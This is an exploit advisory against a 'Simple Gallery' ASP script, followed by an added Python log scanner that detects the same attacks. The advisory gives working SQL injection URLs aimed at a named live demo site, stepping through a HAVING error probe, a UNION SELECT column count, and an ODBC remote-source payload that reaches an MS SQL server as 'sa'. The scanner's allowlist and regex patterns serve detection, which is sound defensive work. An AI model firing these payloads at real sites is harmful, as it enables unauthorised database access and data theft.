#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################
#######By: e.wiZz! ew1zz@hotmail.com
#####Info: Bosnian Idiot FTW!
#####Site: infected.blogger.ba
#####Greetz: Luigi Auriemma, str0ke

In the wild....

######################################################################################
#####Project Name: Simple Gallery ASP Script
#####Site: preprojects.com
#####Vulnerability: SQL Injection
#####PoC on demo site: http://www.preprojects.com/pgallery/gallery/

OK, we have the table "admin", but we need to find how many columns there are in order to extract something... and we need to know at least one column to start... let's find one :)

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'

We got photo_id... let's find how many columns there are:

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin

We got an error:

The number of columns in the two selected tables or queries of a union query do not match.

Try something else...

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin

Response:

No value given for one or more required parameters.

......so it's 9 columns... I won't continue with it.

Connect to a network accessible MS SQL instance (heavy injection :)

http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=,;UID=sa;PWD=; DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'

Almost tutorial :)
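
Added example, not part of the original advisory or the script's own code: a log check for the three probe stages shown above, built on the same integer allowlist for pcat_id that a fixed category_photos.asp would apply before building SQL. The log field layout, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines; assumed field order:
# date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /pgallery/gallery/category_photos.asp p=1&pcat_id=22 192.0.2.10 200
2024-01-01 10:00:05 GET /pgallery/gallery/category_photos.asp p=1&pcat_id=22+HAVING+sum('x')='x' 192.0.2.66 500
2024-01-01 10:00:09 GET /pgallery/gallery/category_photos.asp p=1&pcat_id=22%20union%20select%20photo_id,null%20from%20admin 192.0.2.66 500
2024-01-01 10:00:12 GET /pgallery/gallery/category_photos.asp p=1&pcat_id=22+UNION+SELECT+*+FROM+[ODBC;DRIVER=SQL+SERVER;Server=x].t 192.0.2.66 500
2024-01-01 10:00:20 GET /pgallery/gallery/default.asp - 192.0.2.10 200
"""

INT_RE = re.compile(r"[0-9]{1,9}")  # pcat_id is a numeric category id

# Stage labels follow the steps in the advisory; most specific pattern first.
STAGES = [
    ("odbc-remote-source", re.compile(r"\[\s*odbc\s*;", re.I)),
    ("union-select", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("having-error-probe", re.compile(r"\bhaving\b", re.I)),
]

def valid_pcat_id(value):
    """Allowlist check: digits only, nothing else reaches the query."""
    return INT_RE.fullmatch(value) is not None

def query_param(query, name):
    """Decoded value of one parameter; splits on '&' only so ';' survives."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key.lower() == name:
            return unquote_plus(raw)
    return None

def scan(log_text, page="category_photos.asp", param="pcat_id"):
    """Return (client, stage, value) for every non-integer pcat_id request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        stem, query, client = fields[3], fields[4], fields[5]
        if not stem.lower().endswith("/" + page):
            continue
        value = query_param(query, param)
        if value is None or valid_pcat_id(value):
            continue
        stage = next((n for n, rx in STAGES if rx.search(value)), "non-numeric")
        findings.append((client, stage, value))
    return findings
```

The HTTP 500 responses in the sample lines mirror the error-driven steps in the advisory; a burst of 500s on this page from one client alongside these findings is a useful corroborating signal.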